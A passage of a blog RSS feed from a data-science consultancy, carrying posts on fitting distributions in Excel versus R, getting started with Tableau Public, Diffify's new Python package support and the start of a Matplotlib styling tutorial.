&lt;p&gt;One thing I particularly struggled with when using Excel was the difference in availability of free to use resources. In R there are thousands of open source packages available that either already do what you want or can assist you in getting to your goal. However, since Excel is not open source I found that, whilst resources sometimes already existed to do what I wanted to do, those resources were often pay-to-use. I ended up spending more time developing my own method for something that had already been done by somebody else. I&amp;rsquo;ve been spoiled by the open source nature of R and the availability of community-built packages that do a lot of my work for me.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-learning-excel-after-r"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="working-with-less-common-probability-distributions"&gt;Working with less common probability distributions&lt;/h2&gt;
&lt;p&gt;Before starting to work with Excel I think I was slightly over-optimistic about its capabilities for statistical analysis. I had hoped that there would be built in functions for working with most statistical distributions. Whilst there are built-in functions for some distributions, the availability of these functions is not very consistent. For example, for the Normal distribution there are built-in Excel functions for the PDF, CDF and inverse CDF. However, for the Negative Binomial distribution Excel only provides a function for the PDF and CDF of the distribution, and not for the inverse CDF. I found this inconsistency annoying as functions that I expected to exist, didn&amp;rsquo;t.&lt;/p&gt;
&lt;p&gt;It is worth saying that there is a free to download &lt;a href="https://www.real-statistics.com/free-download/real-statistics-resource-pack/" rel="external"&gt;resource pack&lt;/a&gt; available that does include functions for the inverse CDF of a Negative Binomial distribution, among other useful resources. It was the inconsistent availability of these functions (without the extra resources) that was a little annoying to me. It&amp;rsquo;s worth noting that base R also only includes functions for some of the most common probability distributions. However, at least R is consistent in which functions are available for the distributions.&lt;/p&gt;
&lt;h2 id="increase-in-work-required"&gt;Increase in work required&lt;/h2&gt;
&lt;p&gt;As a consequence of the lack of available free resources, I found that I spent a lot of time and effort developing solutions to problems in Excel. That&amp;rsquo;s especially annoying when I know that it would only take one line of code in R.&lt;/p&gt;
&lt;p&gt;As an example, when fitting a distribution in R, we can use the &lt;code&gt;fitdistr()&lt;/code&gt; function from the {MASS} package. Let’s say we have some data that we think may follow a Negative Binomial distribution and we wish to estimate the parameters of the distribution from the data. If &lt;code&gt;x&lt;/code&gt; is a vector of our data then we can estimate the parameters of the Negative Binomial distribution as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(MASS)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fitdistr&lt;/span&gt;(x, &lt;span style="color:#a5d6ff"&gt;&amp;#34;negative binomial&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In contrast, in Excel this required an entire spreadsheet of work. The spreadsheet involved implementing maximum likelihood estimation of the distribution’s parameters by building formulae to numerically solve the following equation for &lt;em&gt;r&lt;/em&gt;:&lt;/p&gt;
&lt;div style="overflow-x: auto; position: relative"&gt;
$$\left [ \sum_{i=1}^N \psi(x_i + r) \right ] - N\psi(r) + N \ln \left (\frac{r}{r + \sum_{i=1}^N x_i/N} \right ) = 0$$
&lt;/div&gt;
&lt;p&gt;and then using this to solve the following equation for &lt;em&gt;p&lt;/em&gt;:&lt;/p&gt;
&lt;div style="overflow-x: auto; position: relative"&gt;
$$p = \frac{Nr}{Nr + \sum_{i=1}^N x_i} $$
&lt;/div&gt;
&lt;p&gt;where &lt;em&gt;x&lt;/em&gt;&lt;sub&gt;1&lt;/sub&gt;, …, &lt;em&gt;x&lt;/em&gt;&lt;sub&gt;&lt;em&gt;N&lt;/em&gt;&lt;/sub&gt; are the data points and
&lt;em&gt;ψ&lt;/em&gt;() is the digamma function.&lt;/p&gt;
&lt;p&gt;As I’m sure most people would agree - I’d rather not have to manually set up a spreadsheet to solve this equation (playing with digamma functions is not always fun). Especially when I know there&amp;rsquo;s a function in R that already does all of this for me behind the scenes.&lt;/p&gt;
&lt;p&gt;Nevertheless, for the hundred data points contained in column A, the image below shows a screenshot of how this would work in Excel. On top of the formulae included, this also involved using the Excel Solver add-on to do the numerical estimation of &lt;em&gt;r&lt;/em&gt;. Personally, I find this much more complicated than the single line in R!&lt;/p&gt;
&lt;img class="image-center" src="Excel_example.png" alt="Screenshot of an Excel spreadsheet which has a number of complicated formulae set up." style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;p&gt;Many people use Excel every day without any problems, so many people must find working with it far easier than I did. However, I think I come from a relatively unusual place in having learnt to use R before I had a go at Excel. I was really surprised by how hard some things were to do that were really quick in R. However, I think this is down to having many years of practice with R, and very little practice at Excel. It&amp;rsquo;s true that for those without programming experience it may take a bit of time to figure out how to get started with R. But once you have picked up &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;the basics&lt;/a&gt; it can be really quick to solve a lot of problems, and in my opinion, much easier!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/learning-excel-after-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Getting started with Tableau</title><link>https://www.jumpingrivers.com/blog/getting-started-tableau/</link><pubDate>Thu, 17 Nov 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/getting-started-tableau/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/getting-started-tableau/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/getting-started-tableau/header.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="what-is-tableau"&gt;What is Tableau?&lt;/h3&gt;
&lt;p&gt;Tableau is a software company specialising in interactive data visualisations, and Tableau Public is a free platform they offer for sharing insights into data via visualisations. It is intended solely for public data, meaning insights are for anybody to see. They also offer Tableau Server, which is specifically for commercial use with private data.&lt;/p&gt;
&lt;h3 id="why-use-tableau"&gt;Why use Tableau?&lt;/h3&gt;
&lt;p&gt;Tableau is a great option that sits between Excel-like software and using a programming language such as R or Python. Tableau Public is highly intuitive for new users; it&amp;rsquo;s easy to get started and makes analysing data more accessible. For instance, you can manipulate data and join datasets with ease, with no coding involved. There&amp;rsquo;s a big community aspect to Tableau, with many interesting visualisations featured on the home page to inspire, spread knowledge and give recognition.&lt;/p&gt;
&lt;h3 id="what-can-you-create-with-tableau"&gt;What can you create with Tableau?&lt;/h3&gt;
&lt;p&gt;Before we get into how to use this software we&amp;rsquo;d like to showcase two items we found on the homepage which show what is achievable with Tableau Public. First is an aesthetic &lt;a href="https://public.tableau.com/app/profile/elaine.siu/viz/QualityofLife_16599995199570/TheBIGGERtheBETTER" rel="external"&gt;report&lt;/a&gt; based on some 2022 data by Elaine Siu exploring the quality of life within cities. The next one is an interesting &lt;a href="https://public.tableau.com/app/profile/david.potter3468/viz/IfItAintBrokeDontFixIt-MovieRemakes/MovieComparison" rel="external"&gt;visualisation&lt;/a&gt; by David Potter in which he analyses the rating of remade films versus the originals.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-getting-started-with-tableau"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="first-steps"&gt;First steps&lt;/h3&gt;
&lt;p&gt;The first step is heading to the &lt;a href="https://public.tableau.com/app/discover" rel="external"&gt;Tableau Public website&lt;/a&gt; and signing up for an account. It is also possible to use Tableau Public on desktop but today we are covering how to use it on the website. This simply requires an email address and password. Once logged in, you will be taken to the home page where you will see the &amp;ldquo;Viz of the day&amp;rdquo; and other featured visualisations.&lt;/p&gt;
&lt;h3 id="creating-a-workbook"&gt;Creating a workbook&lt;/h3&gt;
&lt;p&gt;From the home page, hover over the create button at the top left of the screen and then click web authoring. This will create a workbook for you, from which you can upload data and start creating visualisations. To save your work at any point, click &amp;ldquo;Publish&amp;rdquo; in the top right corner. The work will become publicly available on your profile, however, if you don&amp;rsquo;t want the work to appear on your profile you can change it in the settings.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of creating worksheet" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/getting-started-tableau/gifs/webauth.gif" width="1845"&gt;&lt;/p&gt;
&lt;h3 id="uploading-your-data"&gt;Uploading your data&lt;/h3&gt;
&lt;p&gt;Uploading data is easy - either drag and drop a file or hit upload from your computer. Tableau accepts many different formats including CSV, MS Excel and Google Sheets. For this example I am using a small data set containing the top premier league goal scorers from &lt;a href="https://en.wikipedia.org/wiki/List_of_footballers_with_100_or_more_Premier_League_goals" rel="external"&gt;Wikipedia&lt;/a&gt;. Tableau will then sort the variables in your data into discrete and continuous data types (you can change this later as you please).&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of uploading data" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/getting-started-tableau/gifs/data.gif" width="1845"&gt;&lt;/p&gt;
&lt;h3 id="first-visualisation"&gt;First visualisation&lt;/h3&gt;
&lt;p&gt;Once the data is uploaded you want to click onto &amp;ldquo;Sheet 1&amp;rdquo; in the bottom left hand corner, this will take you to the first sheet in your workbook. From here you will see all the variables from your data in the data pane to the left of your screen. Just drag and drop the variables you want to visualise into the columns and rows boxes at the top. We are going to plot goals by appearances from our data then colour by player name by dragging the Player variable to the colour box.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of creating first visualisation" height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/getting-started-tableau/gifs/plot.gif" width="1845"&gt;&lt;/p&gt;
&lt;h3 id="new-worksheet"&gt;New worksheet&lt;/h3&gt;
&lt;p&gt;Once happy with your plot (don&amp;rsquo;t worry, you&amp;rsquo;ll still be able to update it), you may want to change it&amp;rsquo;s name from &amp;ldquo;Sheet1&amp;rdquo; to something more descriptive as it will make things easier going forward. Double click the tab that reads &amp;ldquo;Sheet1&amp;rdquo; and type a new name. We&amp;rsquo;ll call ours &amp;ldquo;Goals by Apps&amp;rdquo;. Then to create a new worksheet just click the button next to your first sheet.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of creating worksheet" height="auto" id="h-rh-i-3" src="https://www.jumpingrivers.com/blog/getting-started-tableau/gifs/newworksheet.gif" width="1845"&gt;&lt;/p&gt;
&lt;h3 id="creating-a-dashboard"&gt;Creating a dashboard&lt;/h3&gt;
&lt;p&gt;Finally, to create a dashboard you just have to click &amp;ldquo;New Dashboard&amp;rdquo;. This is found at the bottom next to the sheet names. Once you have the dashboard, drag and drop your sheets from the left hand pane into the configuration you want. In our example, we&amp;rsquo;ve created two more visualisations for the dashboard, which are a bar chart showing the goals to game ratio for the top ten goalscorers and a scatter plot of players goal to game ratio by their debut year. If you update any of the plots in the worksheet the dashboard will update accordingly.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of creating dashboard" height="auto" id="h-rh-i-4" src="https://www.jumpingrivers.com/blog/getting-started-tableau/gifs/dash.gif" width="1845"&gt;&lt;/p&gt;
&lt;h3 id="our-dashboard"&gt;Our dashboard&lt;/h3&gt;
&lt;p&gt;One of the great things about Tableau dashboards is the fact that you can embed them on a web page very easily. If you want to share a dashboard you can either grab the link or grab the embed code and insert it into your website. Our embedded dashboard is below and as you can see it retains interactivity and will update if we change anything on Tableau!&lt;/p&gt;
&lt;div class='tableauPlaceholder' id='viz1667298187623' style='position: relative'&gt;&lt;noscript&gt;&lt;a href='#'&gt;&lt;img alt='Dashboard 1 ' src='https:&amp;#47;&amp;#47;public.tableau.com&amp;#47;static&amp;#47;images&amp;#47;Fo&amp;#47;Footy_test&amp;#47;Dashboard1&amp;#47;1_rss.png' style='border: none' /&gt;&lt;/a&gt;&lt;/noscript&gt;&lt;object class='tableauViz' style='display:none;'&gt;&lt;param name='host_url' value='https%3A%2F%2Fpublic.tableau.com%2F' /&gt; &lt;param name='embed_code_version' value='3' /&gt; &lt;param name='site_root' value='' /&gt;&lt;param name='name' value='Footy_test&amp;#47;Dashboard1' /&gt;&lt;param name='tabs' value='no' /&gt;&lt;param name='toolbar' value='yes' /&gt;&lt;param name='static_image' value='https:&amp;#47;&amp;#47;public.tableau.com&amp;#47;static&amp;#47;images&amp;#47;Fo&amp;#47;Footy_test&amp;#47;Dashboard1&amp;#47;1.png' /&gt; &lt;param name='animate_transition' value='yes' /&gt;&lt;param name='display_static_image' value='yes' /&gt;&lt;param name='display_spinner' value='yes' /&gt;&lt;param name='display_overlay' value='yes' /&gt;&lt;param name='display_count' value='yes' /&gt;&lt;param name='language' value='en-GB' /&gt;&lt;/object&gt;&lt;/div&gt; &lt;script type='text/javascript'&gt; var divElement = document.getElementById('viz1667298187623'); var vizElement = divElement.getElementsByTagName('object')[0]; if ( divElement.offsetWidth &gt; 800 ) { vizElement.style.width='1000px';vizElement.style.height='827px';} else if ( divElement.offsetWidth &gt; 500 ) { vizElement.style.width='1000px';vizElement.style.height='827px';} else { vizElement.style.width='100%';vizElement.style.height='1027px';} var scriptElement = document.createElement('script'); scriptElement.src = 'https://public.tableau.com/javascripts/api/viz_v1.js'; vizElement.parentNode.insertBefore(scriptElement, vizElement); &lt;/script&gt;
&lt;h3 id="what-next"&gt;What next?&lt;/h3&gt;
&lt;p&gt;The next step is for you to get on Tableau and have a go yourself! Try uploading some data and seeing what kinda of visualisation or dashboard you can make. If you don&amp;rsquo;t fancy having a go, you could visit &lt;a href="https://public.tableau.com/app/discover" rel="external"&gt;the website&lt;/a&gt; and have a look at some of the featured dashboards.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/getting-started-tableau/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Diffify - Python release</title><link>https://www.jumpingrivers.com/blog/diffify-python-release-pypi/</link><pubDate>Tue, 15 Nov 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/diffify-python-release-pypi/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/diffify-python-release-pypi/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/diffify-python-release-pypi/diffify_logo.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;It has been 6 months since the launch of &lt;a href="https://diffify.com/" rel="external"&gt;Diffify&lt;/a&gt;, our
website for comparing package releases. We are delighted to announce that, in
addition to CRAN&amp;rsquo;s 20,000 R packages, you can now track 1600 popular Python
packages!&lt;/p&gt;
&lt;h3 id="whats-included"&gt;What&amp;rsquo;s included?&lt;/h3&gt;
&lt;p&gt;The current criteria for a Python package to be included in Diffify are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The package is listed in the top 2000 &lt;a href="https://pypi.org/" rel="external"&gt;PyPI&lt;/a&gt; packages
according to download statistics.&lt;/li&gt;
&lt;li&gt;The package has had version releases since 1st May 2020.&lt;/li&gt;
&lt;li&gt;The package wheel is downloadable from &lt;a href="https://pypi.org/" rel="external"&gt;pypi.org&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If your favourite package is not currently accessible, don&amp;rsquo;t worry! We are
actively working to expand the list to as many PyPI packages as possible, as
we&amp;rsquo;ll explain below.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-diffify-python-release"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="new-content"&gt;New content&lt;/h3&gt;
&lt;p&gt;The first change you&amp;rsquo;ll notice is to our &lt;a href="https://diffify.com/" rel="external"&gt;homepage&lt;/a&gt;, where
we now have buttons for both R and Python.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the new Diffify homepage: In the sidebar there are links to home, R and Python. The main body has some introduction text, and now contains a link to “Get started with Python”." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/diffify-python-release-pypi/homepage.png" width="1826"&gt;&lt;/p&gt;
&lt;p&gt;Clicking on the Python button will take you through to the package search bar.
For this walkthrough, we will compare versions 3.3.0 and 3.5.0 of the Matplotlib
package. Diffify provides a breakdown of the changes to the package
dependencies, functions and classes.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the version comparison page for the Python package Matplotlib: The later version is set to 3.5.0 and the earlier version is set to 3.3.0. Collapsable windows are displayed which contain changes to Dependencies, Functions and Classes." height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/diffify-python-release-pypi/overview.png" width="1825"&gt;&lt;/p&gt;
&lt;h4 id="dependencies"&gt;Dependencies&lt;/h4&gt;
&lt;p&gt;We consider three kinds of dependencies:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;strong&gt;Python&lt;/strong&gt; version requirement.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Required&lt;/strong&gt; Python packages - these must be installed.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Optional&lt;/strong&gt; Python packages - installing these will enable extra package
features.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="A screenshot of the Dependencies window: This includes tabs for the “Python”, “Required” and “Optional” dependencies. The Python requirement has changed from 3.6 to 3.7." height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/diffify-python-release-pypi/dependencies.png" width="1538"&gt;&lt;/p&gt;
&lt;p&gt;In our example, we see that the Python version requirement has changed from
&lt;code&gt;&amp;gt;=3.6&lt;/code&gt; to &lt;code&gt;&amp;gt;=3.7&lt;/code&gt;.&lt;/p&gt;
&lt;h4 id="functions"&gt;Functions&lt;/h4&gt;
&lt;p&gt;Here we provide a list of functions that have been added, removed or changed
between the two versions.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the Functions window: A list of package functions is displayed. Each entry displays the function name prefixed by the module path on the left, and a button for accessing the function “Details” on the right. Each function is colour-coded based on whether it has been added, removed or changed." height="auto" id="h-rh-i-3" src="https://www.jumpingrivers.com/blog/diffify-python-release-pypi/functions.png" width="1542"&gt;&lt;/p&gt;
&lt;p&gt;Clicking on the &amp;ldquo;Details&amp;rdquo; dropdown will bring up the function arguments,
including the argument name and default value. If type annotations are included
in the package source code, Diffify will also display the argument type and the
function return type.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the expanded “Details” for the matplotlib.pyplot.grid function: A table is displayed showing the function arguments for each version, including the argument name, default value, and type. Changed arguments are highlighted. The return type of the function is displayed above this table." height="auto" id="h-rh-i-4" src="https://www.jumpingrivers.com/blog/diffify-python-release-pypi/arguments.png" width="1416"&gt;&lt;/p&gt;
&lt;p&gt;For the &lt;code&gt;pyplot.grid()&lt;/code&gt; function, the name of the first positional argument has
changed from &lt;code&gt;b&lt;/code&gt; to &lt;code&gt;visible&lt;/code&gt;.&lt;/p&gt;
&lt;h4 id="classes"&gt;Classes&lt;/h4&gt;
&lt;p&gt;Here we provide a list of classes that have been added, removed or changed.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the Classes window: A list of package classes is displayed. Each entry displays the class name prefixed by the module path on the left, and a button for accessing the class methods is displayed on the right. Each class is colour-coded based on whether it has been added, removed or changed." height="auto" id="h-rh-i-5" src="https://www.jumpingrivers.com/blog/diffify-python-release-pypi/classes.png" width="1530"&gt;&lt;/p&gt;
&lt;p&gt;Clicking on the &amp;ldquo;Methods&amp;rdquo; button for a class will bring up a pop-up that lists
the methods that belong to that class. The example below shows the methods
&lt;code&gt;.__init__()&lt;/code&gt; and &lt;code&gt;.from_dict()&lt;/code&gt;, which belong to the &lt;code&gt;spines.Spines&lt;/code&gt; class.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the Methods pop-up window for the matplotlib,spines.Spines class: A list of methods belonging to the class is displayed. Each entry displays the method name on the left, and a button for accessing the method “Details” is displayed on the right. Each method is colour-coded based on whether it has been added, removed or changed." height="auto" id="h-rh-i-6" src="https://www.jumpingrivers.com/blog/diffify-python-release-pypi/methods.png" width="1532"&gt;&lt;/p&gt;
&lt;p&gt;Similar to functions, you can access the method arguments by clicking on
&amp;ldquo;Details&amp;rdquo;.&lt;/p&gt;
&lt;h3 id="removing-clutter"&gt;Removing clutter&lt;/h3&gt;
&lt;p&gt;The functions and classes listed above have been detected by analysing the
package source code. We have taken various steps to filter out code that is
intended for internal use by the package developers, including&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ignoring functions and scripts whose names start with a leading underscore&lt;/li&gt;
&lt;li&gt;ignoring functions whose names start &lt;code&gt;test*&lt;/code&gt; and classes whose names start
&lt;code&gt;Test*&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;leaving out scripts whose names start &lt;code&gt;test_*&lt;/code&gt; or end &lt;code&gt;*_test.py&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These criteria are intended to leave out internal code and unit tests.&lt;/p&gt;
&lt;h3 id="looking-ahead"&gt;Looking ahead&lt;/h3&gt;
&lt;p&gt;Python has been around for quite a while, and consequently it has &lt;strong&gt;many&lt;/strong&gt;
packages - 400,000 to be precise! Perhaps unsurprisingly, analysing so many
packages for Diffify has proven to be a bit of a challenge&amp;hellip;&lt;/p&gt;
&lt;p&gt;This is why we have initially chosen to focus on the 2000 most popular PyPI
packages. We will soon extend this to the top 5000, according to
&lt;a href="https://hugovk.github.io/top-pypi-packages/" rel="external"&gt;Top PyPI Packages&lt;/a&gt;. And we won&amp;rsquo;t
be stopping there! It remains to be seen whether we will manage to add all
400,000, but we will certainly try our utmost.&lt;/p&gt;
&lt;p&gt;Despite our best efforts to filter out clutter, you may still come across some
functions and classes that are clearly intended for internal use or unit
testing. We will continue to look at ways to improve our filters.&lt;/p&gt;
&lt;p&gt;We hope you enjoy the new content! As always, if you spot any bugs or have any
suggestions please add an issue to our public
&lt;a href="https://github.com/jumpingrivers/diffify/issues" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Stay tuned for more updates&amp;hellip;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/diffify-python-release-pypi/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Customising figures in Matplotlib</title><link>https://www.jumpingrivers.com/blog/customising-matplotlib/</link><pubDate>Thu, 10 Nov 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/customising-matplotlib/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/customising-matplotlib/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/customising-matplotlib/matplot_title_logo.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://matplotlib.org/" rel="external"&gt;Matplotlib&lt;/a&gt; is one of the longest standing and most comprehensive plotting libraries for Python.
It is mostly used for creating static plots and its flexible customisation options
make it a great choice for creating publication quality graphs.&lt;/p&gt;
&lt;p&gt;In this blog post we will look at formatting and colourmap customisation in Matplotlib,
and how to set a consistent plotting style throughout a project.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Note&lt;/em&gt;: If you wish to run the code snippets in this blog yourself you will need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Matplotlib &amp;gt; 3.6.0&lt;/li&gt;
&lt;li&gt;Numpy&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="global-formatting-with-rcparams"&gt;Global formatting with rcParams&lt;/h2&gt;
&lt;p&gt;In Matplotlib it is possible to change styling settings globally with
&lt;em&gt;runtime configuration (rc) parameters&lt;/em&gt;.
The default Matplotlib styling configuration is set with &lt;code&gt;matplotlib.rcParams&lt;/code&gt;.
This is a dictionary containing formatting settings and their values.
By changing these values we can change default settings throughout an
entire script or notebook.&lt;/p&gt;
&lt;p&gt;For example, if you wanted to set the tick label size to 12pt you would use:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;matplotlib&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;mpl&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rcParams[&lt;span style="color:#a5d6ff"&gt;&amp;#34;xtick.labelsize&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rcParams[&lt;span style="color:#a5d6ff"&gt;&amp;#34;ytick.labelsize&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you are making a plot for publication, a useful thing to do is enable LaTeX and set the font to be consistent with your LaTeX document. This can be done with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rcParams[&lt;span style="color:#a5d6ff"&gt;&amp;#34;text.usetex&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rcParams[&lt;span style="color:#a5d6ff"&gt;&amp;#34;font.family&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Computer Modern Serif&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The full list of rcParams which you can configure can be found &lt;a href="https://matplotlib.org/3.5.0/api/matplotlib_configuration_api.html#matplotlib.rcParams" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you want to later revert to the default settings for Matplotlib you can do this with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rcdefaults()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-customising-matplotlib"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="style-sheets"&gt;Style sheets&lt;/h2&gt;
&lt;p&gt;Matplotlib comes with a selection of available style sheets. These define a range of plotting parameters and can be used to apply those parameters to your plots.&lt;/p&gt;
&lt;h3 id="inbuilt-style-sheets"&gt;Inbuilt style sheets&lt;/h3&gt;
&lt;p&gt;After importing Matplotlib, you can see a list of available style sheets with:&lt;/p&gt;
